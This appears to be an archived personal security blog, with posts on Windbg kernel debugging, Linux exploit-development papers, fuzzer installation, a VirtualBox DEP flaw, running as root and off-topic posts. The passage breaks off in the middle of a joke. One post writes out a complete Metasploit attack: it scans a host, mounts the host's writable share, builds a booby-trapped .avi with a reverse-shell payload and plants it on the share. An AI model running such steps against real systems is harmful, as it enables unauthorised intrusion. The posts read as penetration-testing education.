ihazomgsecurityskillz - Just another security related blog. Author: sickness.<br />
<br />
<strong>Remote kernel debugging using Windbg.</strong> (2012-09-24)<br />
<br />
In the following article we will discuss two different methods of remote kernel debugging using Windbg, covering various operating systems. Let's begin!<br />
<br />
NOTE: It is recommended that you use VMware for this; I have NOT tested this on any other virtualisation software. <br />
<br />
<strong>1. VirtualKD:</strong> <br />
<br />
Given that this is a straightforward installation we will not be covering it in depth; you can find information and the download link on the official website at: <br />
<br />
<a href="http://virtualkd.sysprogs.org/">http://virtualkd.sysprogs.org/</a><br />
<br />
Important notes: <br />
<br />
- This only works between a HOST and a virtual machine; it will NOT WORK between two virtual machines.<br />
- Very fast debugging compared to serial ports. <br />
- Only works on a Windows host, so if you wish to do this on OS X or Linux this will not help you. (There might be other similar software to help you achieve this, however I am not aware of any.)<br />
<br />
<strong>2. Serial Ports: </strong><br />
<br />
Even though this method is documented, I found that most of the online sources were missing some steps or covered an older version of VMware. For the following example we will use the following names: <br />
<br />
"DEBUGEE" - Machine to be debugged.<br />
"DEBUGGER" - Machine which runs the debugger.<br />
<br />
Make sure you have the Windows Debugging Tools installed on the debugger; if you do not, you can download and install them from the following URL: <br />
<br />
<a href="http://msdn.microsoft.com/en-us/windows/hardware/gg463009.aspx">http://msdn.microsoft.com/en-us/windows/hardware/gg463009.aspx</a><br />
<br />
The next step is to edit the .vmx file of both the debugger and the debugee; before saving the changes make sure the file does not already contain serial port lines (serial0, serialport0 and the like). <br />
<br />
<strong>WINDOWS:</strong> <br />
* DEBUGGER:<br />
<br />
<code>serial0.present = "FALSE"<br />serial1.present = "TRUE"<br />serial1.fileType = "pipe"<br />serial1.yieldOnMsrRead = "TRUE"<br />serial1.startConnected = "TRUE"<br />serial1.fileName = "\\.\pipe\D:\windbg"<br />serial1.pipe.endPoint = "client"</code><br />
* DEBUGEE:<br />
<br />
<code>serial0.present = "FALSE"<br />serial1.present = "TRUE"<br />serial1.fileType = "pipe"<br />serial1.yieldOnMsrRead = "TRUE"<br />serial1.startConnected = "TRUE"<br />serial1.fileName = "\\.\pipe\D:\windbg"</code><br />
Of course, the fileName should be a valid path. <br />
<br />
<strong>OS X / LINUX: </strong><br />
* DEBUGGER:<br />
<br />
<code>serial0.present = "FALSE"<br />serial1.present = "TRUE"<br />serial1.fileType = "pipe"<br />serial1.yieldOnMsrRead = "TRUE"<br />serial1.startConnected = "TRUE"<br />serial1.fileName = "/private/tmp/windbg"<br />serial1.pipe.endPoint = "client"</code><br />
<br />
* DEBUGEE: <br />
<br />
<code>serial0.present = "FALSE"<br />serial1.present = "TRUE"<br />serial1.fileType = "pipe"<br />serial1.yieldOnMsrRead = "TRUE"<br />serial1.startConnected = "TRUE"<br />serial1.fileName = "/private/tmp/windbg"</code><br />
The same applies here: fileName should be a valid path.<br />
Now there is only one step left, which is to edit c:\boot.ini on the debugee and add a line as follows: <br />
<br />
<code>multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows Server 2003 Debug" /fastdetect /NoExecute=OptIn /debug /debugport=com2 /baudrate=115200</code><br />
<br />
The above method only applies to Windows XP/2003; for later versions you can use bcdedit.exe as follows: <br />
<br />
<code>bcdedit /debug on<br />bcdedit /enum (to see if debug mode is on)<br />bcdedit /dbgsettings serial debugport:<com_port> baudrate:115200</code> (debugport takes the COM port number, so 2 for COM2)<br />
<br />
The last thing you need to do is open Windbg on your debugger, go to "File -> Kernel Debugging" (make sure you select com2 as the port) and reboot your debugee machine.<br />
<br />
<strong>Linux exploit development part 4 - ASCII armor bypass + return-to-plt</strong> (2011-05-15)<br />
<br />
I know it's been a long time since the last paper but this one gave me some headaches.<br/><br/>Download: <a href="http://www.exploit-db.com/download_pdf/17286">Linux exploit development part 4 - ASCII armor bypass + return-to-plt</a><br/>
<br/>
<strong>Linux exploit development part 3 (rev 2) - Real app demo ret2libc</strong> (2011-04-23)<br/>
<br/>
As you have probably expected, this is the real application demo + video demo of part 3 of my Linux exploit development series.<br/><br/>Technical paper: <a href="http://www.exploit-db.com/download_pdf/17131">Linux exploit development part 3 - ret2libc</a><br/>Demo paper: <a href="http://www.exploit-db.com/download_pdf/17208">Linux exploit development part 3 (rev 2) - Real app demo ret2libc</a><br/>Video demo: <br/><br/><iframe src="http://player.vimeo.com/video/22760600?title=0&byline=0&portrait=0" width="400" height="255" frameborder="0"></iframe><p><a href="http://vimeo.com/22760600">Linux exploit development part 3 (rev 2) - Real app demo</a> from <a href="http://vimeo.com/user5676486">sickness</a> on <a href="http://vimeo.com">Vimeo</a>.</p><br/>
<br/>
<strong>Linux Exploit Development Pt 2 (rev 2) - Real App Demo (part 2)</strong> (2011-04-12)<br/>
<br/>
Question:<br/>In short, why another part 2 if we already have one?<br/><br/>Answer:<br/>Recently I've been receiving feedback from people who have read the papers, and amongst them _sinn3r and corelanc0d3r actually recommended that I should also give examples using real vulnerable applications.<br/><br/>About the paper:<br/>I will not be repeating myself; this paper does not contain any theory. If you do not have the required knowledge I suggest you first read my part 2 paper before trying this: <a href="http://www.exploit-db.com/download_pdf/17049">Linux Exploit Writing Tutorial Pt 2 - Stack Overflow ASLR bypass Using ret2reg</a><br/><br/>The paper can be found <a href="http://www.exploit-db.com/download_pdf/17154">here</a>, and along with the paper I've also made a quick video demonstration:<br/><br/><iframe src="http://player.vimeo.com/video/22242861" width="400" height="300" frameborder="0"></iframe><p><a href="http://vimeo.com/22242861">Linux exploit development part 2 (rev 2) - Demo</a> from <a href="http://vimeo.com/user5676486">sickness</a> on <a href="http://vimeo.com">Vimeo</a>.</p><br/><br/>Hope you enjoy it and have fun :)<br/>
<br/>
<strong>Linux exploit development part 3 - ret2libc</strong> (2011-04-08)<br/>
<br/>
I'm not going to repeat myself from the paper; this will just be a short description of what the paper contains.<br/><br/>So in the previous tutorials our exploits were made on Backtrack 4 R2; now we are going to make them on Debian Squeeze (latest) because Backtrack does not have DEP enabled by default (PAE enabled kernel on 32 bits).<br/><br/>In short, DEP or NX prevents some stack or heap memory regions from being executed; it also prevents executable memory from being writable. This is very effective against buffer overflows that inject and execute malicious code. 
(More about NX <a href="http://en.wikipedia.org/wiki/NX_bit">here</a>)<br/><br/>How to bypass this!? ... -> <a href="http://www.exploit-db.com/download_pdf/17131">Linux exploit development part 3 - ret2libc.pdf</a><br/>
<br/>
<strong>Linux Exploit Writing Tutorial Pt 2 - Stack Overflow ASLR bypass Using ret2reg</strong> (2011-03-26)<br/>
<br/>
As expected, here is part 2 of my tutorial series. I'm not going to repeat myself again, so without any other introduction here it is:<br/><br/><a href="http://www.exploit-db.com/download_pdf/17049">Linux Exploit Writing Tutorial Pt 2 - Stack Overflow ASLR bypass Using ret2reg</a><br/>
<br/>
<strong>Linux exploit development part 1 - Stack overflow.</strong> (2011-03-19)<br/>
<br/>
I've started to write a series of tutorials about exploit development on Linux. This is the first part, which contains a stack overflow with a hardcoded ESP address (I know it's unreliable, that's why it's part 1).<br/>Anyway, here is the PDF: <a href="http://www.exploit-db.com/download_pdf/17008">Linux exploit development part 1 - Stack overflow</a><br/><br/>Hope you enjoy it.<br/>
<br/>
<strong>Installing and Tweaking SPIKE and sickfuzz v0.3</strong> (2011-03-12)<br/>
<br/>
Not sure how many tried out this "fuzzer", but v0.3 is out with more pwnsauce.<br/><br/>Download link: <a href="http://code.google.com/p/sickfuzz/downloads/list">http://code.google.com/p/sickfuzz/downloads/list</a><br/>svn checkout http://sickfuzz.googlecode.com/svn/trunk/ sickfuzz<br/><br/>New features:<br/>- Some SPIKE tweaks.<br/>- Changed the SPIKE fuzzer.<br/>- Modified the .spk scripts.<br/>- More logs available.<br/>- More detailed help screen as well as output.<br/><br/>Fixed bugs:<br/>- Fixed the trailing-slash issue; paths no longer have to end with "/".<br/>- Now stops when the app crashes instead of going on to the other scripts.<br/><br/>Install SPIKE and sickfuzz:<br/><br/><code>root@bt:~# apt-get install automake<br/>root@bt:~# rm -rf /pentest/fuzzers/spike/<br/>root@bt:~# wget -P /tmp http://www.immunitysec.com/downloads/SPIKE2.9.tgz<br/>root@bt:~# tar xvzf /tmp/SPIKE2.9.tgz -C /pentest/fuzzers && rm /tmp/SPIKE2.9.tgz<br/>root@bt:~# cd /pentest/fuzzers/SPIKE/SPIKE/src/</code><br/><br/>Before actually starting to compile SPIKE we will make a little tweak (thanks master @lupin for this one!).<br/>Open up spike.c; there are 2 lines that look like this:<br/><br/><code>printf("tried to send to a closed socket!\n");</code><br/><br/>Each of these 2 lines is followed by a "return 0;" instruction on the next line; replace that instruction with "exit(1);", save the file and proceed.<br/>(NOTE: ONLY REPLACE THOSE 2 INSTRUCTIONS, NOT ALL!)<br/><br/><a href="http://sickness.tor.hu/wp-content/uploads/2011/03/snapshot1.png">snapshot_1</a><br/><a href="http://sickness.tor.hu/wp-content/uploads/2011/03/snapshot2.png">snapshot_2</a><br/><a href="http://sickness.tor.hu/wp-content/uploads/2011/03/snapshot3.png">snapshot_3</a><br/><a href="http://sickness.tor.hu/wp-content/uploads/2011/03/snapshot4.png">snapshot_4</a><br/><br/>Now we can proceed with SPIKE:<br/><br/><code>root@bt:/pentest/fuzzers/SPIKE/SPIKE/src# aclocal<br/>root@bt:/pentest/fuzzers/SPIKE/SPIKE/src# automake<br/>root@bt:/pentest/fuzzers/SPIKE/SPIKE/src# ./configure<br/>root@bt:/pentest/fuzzers/SPIKE/SPIKE/src# sed -i 's/CFLAGS = -Wall -funsigned-char -c -fPIC -ggdb/CFLAGS = -Wall -funsigned-char -c -fPIC -ggdb -fno-stack-protector/g' Makefile<br/>root@bt:/pentest/fuzzers/SPIKE/SPIKE/src# make</code><br/><br/>If you get this error: <br/><br/><code>configure: creating ./config.status<br/> cd && /bin/sh ./config.status Makefile<br/>/bin/sh: ./config.status: No such file or directory<br/>make: *** [Makefile] Error 127</code><br/><br/>Execute the following commands again:<br/><br/><code>root@bt:/pentest/fuzzers/SPIKE/SPIKE/src# aclocal<br/>root@bt:/pentest/fuzzers/SPIKE/SPIKE/src# automake<br/>root@bt:/pentest/fuzzers/SPIKE/SPIKE/src# ./configure<br/>root@bt:/pentest/fuzzers/SPIKE/SPIKE/src# sed -i 's/CFLAGS = -Wall -funsigned-char -c -fPIC -ggdb/CFLAGS = -Wall -funsigned-char -c -fPIC -ggdb -fno-stack-protector/g' Makefile<br/>root@bt:/pentest/fuzzers/SPIKE/SPIKE/src# make</code><br/><br/>It should have worked now.<br/><br/><code>root@bt:/pentest/fuzzers/SPIKE/SPIKE/src# mv -f /pentest/fuzzers/SPIKE/SPIKE/src /pentest/fuzzers/spike/<br/>root@bt:/pentest/fuzzers/SPIKE/SPIKE/src# cd<br/>root@bt:~# rm -rf /pentest/fuzzers/SPIKE/<br/><br/>root@bt:~# cd /pentest/fuzzers/<br/>root@bt:/pentest/fuzzers# svn checkout http://sickfuzz.googlecode.com/svn/trunk sickfuzz</code><br/><br/>Also, if you are interested, <a href="http://g0tmi1k.blogspot.com/">g0tmi1k</a> made a nice script to automate the whole process:<br/><a href="http://code.google.com/p/sickfuzz/downloads/list">http://code.google.com/p/sickfuzz/downloads/list</a><br/><br/>For more info on using SPIKE check out lupin's guides: <br/><a href="http://resources.infosecinstitute.com/intro-to-fuzzing/">http://resources.infosecinstitute.com/intro-to-fuzzing/</a><br/><a href="http://resources.infosecinstitute.com/fuzzer-automation-with-spike/">http://resources.infosecinstitute.com/fuzzer-automation-with-spike/</a><br/>
<br/>
<strong>sickfuzz - HTTP fuzzer.</strong> (2011-03-03)<br/>
<br/>
Before we get started, let's begin with some basic knowledge which you might or might not know:<br/><br/><strong># What is fuzzing?</strong><br/><br/> So in short, fuzzing is a technique used to discover coding errors in software by sending unexpected data to a specific port, app, etc. For example, if we have a small application that asks us for a number between 1 and 10 and then divides our number by 2, what will happen if we enter "%Io&6...."? 
(It's not the best example, I know, but I think you get the picture.)<br/><br/><strong># How does this help us?</strong><br/><br/> Well, depending on how the application crashes we can find a number of vulnerabilities like buffer overflows, DoS, etc.<br/> NOTE: The definitions above are not complete; if you want more details I suggest you try Google.<br/><br/>Before we begin, a few answers to some questions that most of you will ask:<br/><br/><strong> 1. Why did I make a fuzzer, when there are other fuzzers out there?</strong><br/><br/> Yes, you are right, there are a lot of other fuzzers out there; my fuzzer wasn't intended to be a public fuzzer. I started making it for personal use and to learn more about fuzzing, but some friends told me I should give it a try and publish it, maybe people will like it.<br/><br/><strong> 2. Why is my fuzzer more special than other fuzzers out there?</strong><br/><br/> The answer is simple: it's not! I didn't make it to be more special than other fuzzers out there, I just included some features that I needed and nothing more.<br/><br/>Ok, now that we have covered these basic questions let's move on and see how it works and what features it has:<br/><br/><strong># What is sickfuzz?</strong><br/><br/> sickfuzz is a wrapper around <a href="http://www.immunitysec.com/resources-freesoftware.shtml">SPIKE</a> written in Python.<br/><br/><strong># How does it work?</strong><br/><br/> It accepts CLI arguments and based on those it launches SPIKE's "generic_send_tcp" with custom-made .spk files.<br/><br/><strong># What other features does it have?</strong><br/><br/> - tshark (CLI version of Wireshark) support: once you start fuzzing, tshark starts to capture the HTTP packets that go to your specified port for later analysis.<br/><br/> - Checks to see if the app crashed or not. Most apps, if they receive a large number of requests, start denying them, and most fuzzers see that as a crash and just stop; sickfuzz however, when it encounters such behaviour, checks to see if the application did really crash or not, and if the application is still up it resumes the fuzzing process.<br/><br/> - It's really fast and has a lot of mutations (SPIKE rocks!)<br/><br/><strong># What do I need to run it?</strong><br/> - <a href="http://www.immunitysec.com/resources-freesoftware.shtml">SPIKE</a><br/> - <a href="http://www.wireshark.org/">Wireshark (tshark + editcap)</a><br/> - <a href="http://www.python.org/getit/">Python</a><br/> - Web server victims<br/><br/>Also <a href="http://g0tmi1k.blogspot.com/">g0tmi1k</a> made a cool video demonstrating how to use it, check it out:<br/><br/><embed allowfullscreen="true" allowscriptaccess="always" height="500" src="http://blip.tv/play/hdkFgqflYwA%2Em4v" type="application/x-shockwave-flash" width="500"></embed><br/><br/>Download <a href="http://code.google.com/p/sickfuzz/downloads/list">sickfuzz</a><br/><br/>Ok, now at the end I want to thank all who helped me with the fuzzer:<br/><a href="http://archangelamael.shell.tor.hu/">ArchangelAmael</a><br/><a href="http://www.nullthreat.net/">Nullthread</a><br/><a href="http://0entropy.blogspot.com/">Dinos</a><br/><a href="http://www.corelan.be/">corelanc0d3r</a><br/><a href="http://g0tmi1k.blogspot.com/">g0tmi1k</a><br/><br/><a href="http://g0tmi1k.blogspot.com/">g0tmi1k's</a> blog post <a href="http://g0tmi1k.blogspot.com/2011/03/video-sickfuzz-v02.html">here</a>.<br/>
<br/>
<strong>Exploit writing made easy with !pvefindaddr.</strong> (2011-02-06)<br/>
<br/>
This is a quick paper I wrote containing a tutorial on how to use <a href="http://redmine.corelan.be:8800/projects/pvefindaddr">!pvefindaddr</a> made by <a href="https://twitter.corelanc0d3r">corelanc0d3r</a>; it does not cover the creation of an exploit, only how this tool helps you in writing an exploit.<br/><br/>Download link: <a href="http://sickness.tor.hu/wp-content/uploads/2011/02/Exploit_writing_made_easy_with_pvefindaddr.pdf">Exploit_writing_made_easy_with_pvefindaddr.pdf</a><br/>
<br/>
<strong>ROP retn+offset and impact on stack setup.</strong> (2011-01-30)<br/>
<br/>
Ok so in short, I was playing with ROP chained exploits; in particular I was making an exploit for <a href="http://mini-stream.net/wm-downloader/">WM Downloader</a>.<br/><br/>I finally finished it and then asked <a href="https://twitter.com/#!/corelanc0d3r">corelanc0d3r</a> from the <a href="http://www.corelan.be:8800/">Corelan team</a> to test it. The exploit was good, but there were some ROP gadgets that differed, so we tried to replace them and this came up: http://www.exploit-db.com/exploits/16072/<br/><br/>Everything seemed ok ... but something was weird; as you can see we have a ROP gadget containing:<br/><code># INC ESI # PUSH EAX # POP ESI # POP EBP # RETN 4</code><br/><br/>I had some issues with the padding for RETN 4, so I asked <a href="https://twitter.com/#!/corelanc0d3r">corelanc0d3r</a> for a general padding rule, and then we realized that no one actually has one. (Or not one that we know about.) So we started documenting it and finally this came up: <a href="http://www.corelan.be:8800/index.php/2011/01/30/hack-notes-rop-retnoffset-and-impact-on-stack-setup/">Corelan Site</a><br/>
<br/>
<strong>VBox DEP issue.</strong> (2011-01-07)<br/>
<br/>
First of all, here is a quick demo of the issue: <br/><iframe src="http://player.vimeo.com/video/18547102" width="400" height="300" frameborder="0"></iframe><p><a href="http://vimeo.com/18547102">DEP Issue on VBox</a> from <a href="http://vimeo.com/user5676486">sickness</a> on <a href="http://vimeo.com">Vimeo</a>.</p><br/><br/>Ok, now that you have seen the demo:<br/><br/>A lot of people enable DEP on VirtualBox, but did anyone test it to see if it works properly? Well, guess what, it doesn't!<br/><br/>*How?<br/> Well, I wanted to test some DEP bypass methods, and I have this habit: before actually trying to bypass DEP, I turn it off and test the app with a simple exploit (usually to launch calc.exe). But I forgot to turn DEP off, it remained on, and when I launched the exploit I did not receive a DEP error and the calculator got executed; you can take a look at the quick video demo to check it out.<br/><br/>*What I did.<br/> I started trying different things to make it work, like upgrading to the latest VBox, making sure that my CPU supported NX, enabling PAE/NX from VBox, reinstalling the guest OS with PAE/NX enabled from the beginning, and others. Everything seemed ok but DEP was not working. I tried using tools like NXTEST, which actually told me that DEP wasn't enabled, so I tried the same configuration on VMware and what do you know ... it worked!<br/> After seeing that VMware DEP works I asked a few people to help me confirm this VBox issue. 
From the feedback of these tests I learned that only 32 bit CPUs are affected by this; DEP works on 64.<br/> <br/>*Reason for this issue.<br/> So after seeing this issue I reported it to the guys at VBox, who after a while told me that they have figured out what is causing the problem; it's normal but they have not documented it yet. (Great, because DEP not working is not such a big deal, what could happen!?)<br/> QUOTE: <br/> "For raw mode we do NOT enable NX protection by default. I'm currently not<br/> aware of the exact reason but I believe this is to keep the code simpler<br/> or there are some compatibility issues."<br/> (Yet this is not documented)<br/> <br/>*Fix.<br/> In order to fix this you need the following:<br/> - NX and PAE support (cat /proc/cpuinfo and check the flags for nx and pae)<br/> - A PAE enabled kernel (which doesn't make much sense to me; VMware DEP works without a PAE enabled kernel, and NX and PAE are 2 different things from my point of view, but I might be wrong.)<br/> - You also need to invoke a command from the terminal to enable NX, because apparently the option "Enable PAE/NX" from VBox doesn't work (not sure why they included it in the first place).<br/><br/> Ok so in order to fix DEP in VBox, your CPU must support NX and PAE, you must run a PAE enabled kernel and:<br/> Open a terminal with the same privileges as your virtual machines and type in:<br/><br/> <code>VBoxManage list vms</code><br/> <br/> You will get something like this: "Windows" {xxxxxx-xxxx-xxxx-xxxx-xxxxxxxx} <br/> Now issue the following command, considering Windows as the name of your VM (the virtual machine must be stopped):<br/><br/> <code>VBoxManage setextradata "Windows" VBoxInternal/CPUM/EnableNX 1</code><br/><br/> Now start the VM and DEP should work.<br/><br/> Author: sickness<br/>
<br/>
<strong>Blog status update.</strong> (2011-01-01)<br/>
<br/>
Due to recent events I do not have enough time to keep my blog updated very frequently; I will maintain it for the people who seek information from it and will post as soon as I have time.<br/>
<br/>
<strong>Update_bt.py script.</strong> (2010-11-18)<br/>
<br/>
Well, I recently started learning Python and at first I just wanted to see if I could do a basic update script, and this is what came up.<br/><br/>Hope you like it; also I would appreciate some suggestions about what else it should contain.<br/>It includes an internet connectivity check.<br/>This script currently:<br/>* Upgrades/Cleans Backtrack<br/>* Exploits: Metasploit2,3, Exploit-db, SET, FastTrack<br/>* Vulnerability Scanners: OpenVAS, Nikto, W3AF, Nessus (if you have it)<br/>* Wireless: Aircrack, Airodump, Kismet, Gerix<br/><br/>All of the above sections are included in different menus.<br/><br/><img alt="" src="http://img502.imageshack.us/img502/5025/91649502.png" title="bt_up.1" class="alignnone" width="590" height="450" /><br/><br/><br/><img alt="" src="http://img404.imageshack.us/img404/6885/25093397.png" title="bt_up.2" class="alignnone" width="590" height="450" /><br/><br/>EDIT: Well, I have taken into consideration the suggestions I received via PM, so I rewrote the script and included categories and more tools, here you go: <br/><br/><a href="http://sickness.tor.hu/wp-content/uploads/2011/02/bt_up.v.0.2.tar.gz">bt_up.tar.gz</a><br/>
<br/>
<strong>Nessus bridge for Metasploit.</strong> (2010-10-04)<br/>
<br/>
<embed src="http://blip.tv/play/AYKBnwkA" type="application/x-shockwave-flash" width="450" height="400" allowscriptaccess="always" allowfullscreen="true"></embed><br/>
<br/>
<strong>Hiding meterpreter using Iexpress.</strong> (2010-09-21)<br/>
<br/>
<embed src="http://blip.tv/play/AYH%2BrwAA" type="application/x-shockwave-flash" width="450" height="400" allowscriptaccess="always" allowfullscreen="true"></embed><br/>
<br/>
<strong>Backtrack vs Windows.</strong> (2010-09-19)<br/>
<br/>
<object width="480" height="385"><param name="movie" value="http://www.youtube.com/v/WijVqtORa0Y?fs=1&hl=en_US"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="http://www.youtube.com/v/WijVqtORa0Y?fs=1&hl=en_US" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="480" height="385"></embed></object><br/>
<br/>
<strong>Running as root!?</strong> (2010-09-08)<br/>
<br/>
Ok so a lot of you people like using Backtrack, and now that it's Debian based and it is possible to use it as a daily OS, things have changed a bit.<br/><br/> Now, as you know, there are a few guides on how to make an unprivileged user in Backtrack. <br/><a href="http://www.backtrack-linux.org/forums/backtrack-howtos/1741-howto-create-unprivileged-non-root-user-backtrack.html">Unprivileged user in BT</a><br/> Normally it's good to make an unprivileged user, but I must remind you that Backtrack is not a normal OS; most of its applications must be run as root, it was basically made to run as root and nothing else.<br/> If you ask people if it's ok to run as root, you will get an answer similar to this one: "It's not safe to run as root!", but did anyone tell you why? Or when it is safe to run as root?<br/><br/>I'm going to try to clarify the risks and all that stuff regarding "Running as root".<br/>Keep in mind that what I am saying here applies to normal desktop PCs or laptops, not servers ....<br/><br/>Ok so let's begin:<br/><br/>Running as root has a bright side as well as a dark side:<br/><br/> ***BRIGHT SIDE*** <br/><br/> As you know, the "root" account on a *nix system is the most privileged account. This account allows you to do anything you want without asking questions: changing passwords, installing applications, adding accounts, etc. The computer does not hassle you with confirmations and questions because it thinks you know what you are doing ... 
so if you don't log out now!<br/>This is a good thing because it does not bother you to type sudo for everything which gets annoying after a while.<br/><br/> ***DARK SIDE***<br/><br/> Now a lot of people are afraid to run as root, because they might break something ... and this is true, if you run as root and have no clue about what you are doing you might end up with 3 reinstalls per day. <br/>Running as root is not for everyone, you need some advanced skills in using the bash + some advanced knowledge about *nix. Oh and if you can't play in the bash without typing "rm -rf /*" every 20 seconds then close this window and stop reading for your own safety.<br/><br/> So base line. If you are not sure you can handle it and don't want to accidentally lose your important data or stuff don't run as root.<br/><br/> Another thing in running as root, people often say that you should not run as root for security reasons, this is also true. If an attacker gets hold of your system he will be root and he could do anything with your PC, but now I ask you ... how many services do you need running 24/7 on your home PC/laptop ?<br/><br/> Sure there are other ways of getting access to your system, like if you are in a LAN with others, they could try a MITM and maybe sniff your credentials but there are programs to protect you from this kind of attacks, you can even use ettercap for this or arpwatch, I'm sure if you google this things you will come up with something.<br/> Other methods would be to set an ev!l server with metasploit or SET and trick you in clicking it or send an email with some malicious .pdf or I don't know, now if you know you would click every link people give you and read every attachment on your email without scanning it ... 
close the windows NOW!<br/><br/>Now this are some of the security risks that you need to be aware of when running as root.<br/>Oh and one last thing don't think that if you're not running as root you are completely bullet proof !sicknesshttp://www.blogger.com/profile/17691718852120293893noreply@blogger.com0tag:blogger.com,1999:blog-6983143534824228892.post-56567893536324198522010-09-04T01:14:00.000-07:002012-12-29T03:36:38.765-08:00Sickness - Owning a windows xp with metasploit.<embed src="http://blip.tv/play/AYH6mFgA" type="application/x-shockwave-flash" width="450" height="400" allowscriptaccess="always" allowfullscreen="true"></embed><br/><br/>Ok so first of all I did not do any video editing, so don't complain about it !<br/>Second of all excuse me if I made some English mistakes I'm not a perfect English speaker.<br/>Third this is a basic video.<br/><br/>So in this tutorial I am going to show you how to own a windows XP SP2 who has the folder "My Documents" shared with read/write permissions by uploading an infected .avi file to the victim's machine.<br/><br/>The tools used: fping, nmap, metasploit, inguma<br/><br/>Commands:<br/>Code:<br/><br/> fping -g 192.168.1.60 192.168.1.70<br/>nmap -sS -sV -f -n -O 192.168.1.66<br/>cd /pentest/exploits/framework3/<br/>./msfconsole<br/>cd /pentest/exploits/inguma<br/>./inguma.py<br/> autoscan<br/> 192.168.1.66<br/> y<br/> n<br/>cd /pentest/python/impacket-examples/<br/>./smbclient<br/> open 192.168.1.66<br/> login username password<br/> shares<br/>smbmount //192.168.1.66/Documents /media/<br/> cd /media/<br/> ls<br/><br/>Metasploit commands (making the infected .avi):<br/>Code:<br/><br/>search vlc<br/>use windows/fileformat/videolan_tivo<br/>set PAYLOAD windows/shell_reverse_tcp<br/>show options<br/>set FILENAME watch_me.avi<br/>set OUTPUTPATH /root/sickness/desktop/<br/>set LHOST 192.168.1.64<br/>exploit<br/><br/>Metasploit handler:<br/>Code:<br/><br/>use exploit/multi/handler<br/>set PAYLOAD 
windows/shell_reverse_tcp<br/>set LHOST 192.168.1.64<br/>exploit<br/><br/>Dropping the file onto the mounted share:<br/>Code:<br/><br/>cd /root/sickness/desktop<br/>mv -f watch_me.avi /media/Downloads<br/>smbumount /media<br/><br/>Posted by sickness (http://www.blogger.com/profile/17691718852120293893)<br/><br/><br/>Backtrack Products.<br/>Published 2010-09-01T02:58:00-07:00, updated 2012-12-29T03:36:38-08:00<br/><br/>Well, it seems like my 3-4 month signature on the <a href="http://www.backtrack-linux.org/forums/">Backtrack forum</a>, "I want a Backtrack T-Shirt!", finally paid off.<br/>This morning <a href="http://archangelamael.blogspot.com/">archangelamael</a> told me that I could buy one, and a lot more Backtrack accessories besides, but why not take a look yourself.<br/><br/><a href="http://www.trixgraphix.com/shop/category/backtrack-swag/">Backtrack Shop</a><br/><br/>Posted by sickness (http://www.blogger.com/profile/17691718852120293893)<br/><br/><br/>16 songs for evil hax0rz !!!<br/>Published 2010-08-30T15:46:00-07:00, updated 2012-12-29T03:36:38-08:00<br/><br/>Ok, so rule number 1: "If you want to be an evil hax0r you have to listen to good music!" 
so here is a list of songs for hax0rz with YouTube links:<br/><br/>1. <a href="http://www.youtube.com/watch?v=lezoOJb-yVw">Mushroomhead - Sun doesn't rise</a> (searching Google)<br/>2. <a href="http://www.youtube.com/watch?v=U45NfWSX-Vk">Mushroomhead - Solitaire Unraveling</a> (Nmap scan)<br/>3. <a href="http://www.youtube.com/watch?v=DB-3-TVjrxU">Infected Mushroom - Heavyweight</a> (Nessus & NeXpose)<br/>4. <a href="http://www.youtube.com/watch?v=tDE8q9YKC6Q">The Qemists - Stompbox (Spor Remix)</a> (putting info together)<br/>5. <a href="http://www.youtube.com/watch?v=_Pyn87oJIlg">Mt Eden Dubstep - Prodigy : Omen</a> (found a nice vulnerability)<br/>6. <a href="http://www.youtube.com/watch?v=lolM8GeGRQc">In Flames - My sweet shadow</a> (when you are bruteforcing)<br/>7. <a href="http://www.youtube.com/watch?v=jJP5MqniJZo&feature=related">In Flames - Cloud Connected</a> (wireless cracking)<br/>8. <a href="http://www.youtube.com/watch?v=xX6UjWMffaY">Megadeth - Symphony of Destruction</a> (buffer overflow) MEGADETH RULZZZ<br/>9. <a href="http://www.youtube.com/watch?v=vMh-iXnkH18&ob=av2n">Megadeth - Trust</a> (sniffing) THEY RULE AGAIN :X<br/>10. <a href="http://www.youtube.com/watch?v=8qRVNyot34o">Pantera - Walk</a> (pivoting)<br/>11. <a href="http://www.youtube.com/watch?v=_10zZ1XpmU0">Children of Bodom - Angels Don't Kill</a> (preparing for a social engineering attack)<br/>12. <a href="http://www.youtube.com/watch?v=QcXVnyiQjBE">Soilwork - Nerve</a> (cracking a hash)<br/>13. <a href="http://www.youtube.com/watch?v=WEQnzs8wl6E">Metallica - Fade to black</a> (when your internet connection drops) Metallica rule too!!<br/>14. <a href="http://www.youtube.com/watch?v=1M6kdQtm4wE">AC/DC - Back in Black</a> (especially for blackhats)<br/>15. <a href="http://www.youtube.com/watch?v=UfY-UhwRP-A&feature=related">AC/DC - Stiff upper lip</a> (after a successful pentest)<br/>16. <a href="http://www.youtube.com/watch?v=ZPXdlVpLaWk">Disturbed - Pain Redefined</a> (when you present the pentest report and show the world how evil you are!)<br/><br/>The songs are not in order of my liking; they are in random order.<br/>If you know more songs, feel free to comment here with a YouTube link and a "moment" for listening!<br/><br/>Posted by sickness (http://www.blogger.com/profile/17691718852120293893)<br/><br/><br/>Blog status updated !!<br/>Published 2010-08-30T13:13:00-07:00, updated 2012-12-29T03:36:38-08:00<br/><br/>Ok, now, as you have all been seeing, lately I haven't posted a lot, and there is a reason for that. 
I was on vacation and did not take anything related to technology with me.<br/><br/>Well, now that I am back, things will change. I've already prepared some nice posts and started remaking the tutorials and editing them properly, and I have also been submitting my tutorials to <a href="http://securitytube.net">Securitytube</a>, so hopefully there will be more video tutorials for you to watch.<br/><br/>However, the first priority is to finish remaking my tutorials.<br/><br/>Oh, and one last thing: I appreciate your comments and visits, and I hope I can post more stuff that you guys like!<br/><br/>Posted by sickness (http://www.blogger.com/profile/17691718852120293893)<br/><br/><br/>.NET vs Java programmers !<br/>Published 2010-08-30T01:18:00-07:00, updated 2012-12-29T03:36:38-08:00<br/><br/>A group of 4 Microsoft .NET programmers and a group of 4 Java programmers are going on a train to an expo. The MS programmers buy a ticket each, and then watch the Java programmers proceed to buy one ticket between them.<br/><br/>The MS programmers are intrigued, and when they get on the train they watch the Java programmers to see what they do when the guard comes to check the tickets. It turns out that, before the guard comes, they all cram into the toilet. The guard knocks on the door and asks for the ticket. The guard takes it from under the door and slides it back.<br/><br/>The MS programmers are all impressed, so on the way back they buy only one ticket, only to watch the Java folks get on the train without buying a ticket at all.<br/><br/>When they get on the train, the MS people cram into the toilet, as they saw the Java folks do on the earlier journey. The Java programmers then knock on the door 